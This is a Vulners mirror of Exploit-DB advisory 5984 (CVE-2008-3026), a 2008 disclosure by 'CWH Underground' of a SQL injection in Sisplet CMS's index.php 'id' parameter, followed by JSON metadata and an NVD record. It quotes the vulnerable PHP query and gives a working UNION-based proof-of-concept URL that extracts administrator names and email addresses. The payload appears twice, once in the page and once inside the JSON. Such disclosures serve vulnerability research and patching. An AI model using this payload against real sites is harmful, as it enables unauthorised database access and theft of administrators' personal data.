Search...

Sisplet CMS index.php id 2008-01-24 - Remote SQL Injection Vulnerability

2008-07-01T00:00:00

ID EDB-ID:5984
Type exploitdb
Reporter CWH Underground
Modified 2008-07-01T00:00:00

Description

Sisplet CMS (index.php id) Remote SQL Injection Vulnerability. CVE-2008-3026. Webapps exploit for php platform

                                        
                                            =================================================================
  Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
=================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Sisplet CMS
 VERSION     : 2008-01-24
 VENDOR      : http://cms.sisplet.org/
 DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (function.php)
-----------------------------------

$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");


---------
 Exploit
---------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]


------
 POC
------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-07-01]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5984", "hash": "e8e610421d60e776f8bba8fcca4160ac", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sisplet CMS index.php id 2008-01-24 - Remote SQL Injection Vulnerability", "description": "Sisplet CMS (index.php id) Remote SQL Injection Vulnerability. CVE-2008-3026. Webapps exploit for php platform", "published": "2008-07-01T00:00:00", "modified": "2008-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5984/", "reporter": "CWH Underground", "references": [], "cvelist": ["CVE-2008-3026"], "lastseen": "2016-01-31T23:57:50", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T23:57:50"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3026"]}], "modified": "2016-01-31T23:57:50"}, "vulnersScore": 7.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5984/", "sourceData": "=================================================================\n Sisplet CMS (index.php id) Remote SQL Injection Vulnerability\n=================================================================\n\n ,--^----------,--------,-----,-------^--,\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\n `+---------------------------^----------|\n `\\_,-------, _________________________|\n / XXXXXX /`| /\n / XXXXXX / `\\ /\n / XXXXXX /\\______(\n / XXXXXX / \n / XXXXXX /\n (________( \n `------'\n\n\nAUTHOR : CWH Underground\nDATE : 1 July 2008\nSITE : cwh.citec.us\n\n\n#####################################################\n APPLICATION : Sisplet CMS\n VERSION : 2008-01-24\n VENDOR : http://cms.sisplet.org/\n DOWNLOAD : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip\n#####################################################\n\n--- Remote SQL Injection ---\n\n** Magic Quote must turn off **\n\n-----------------------------------\n Vulnerable File (function.php)\n-----------------------------------\n\n$sql = mysql_query(\"SELECT parent FROM menu WHERE id = '$id'\");\n\n\n---------\n Exploit\n---------\n\n[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]\n\n\n------\n POC\n------\n\n[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0\n\n\n##################################################################\n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #\n##################################################################\n\n# milw0rm.com [2008-07-01]\n", "osvdbidlist": ["46878"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.php in OneClick CMS (aka Sisplet CMS) 2008-01-24 allows remote attackers to execute arbitrary SQL commands via the id parameter.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-3026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3026", "published": "2008-07-07T18:41:00", "title": "CVE-2008-3026", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}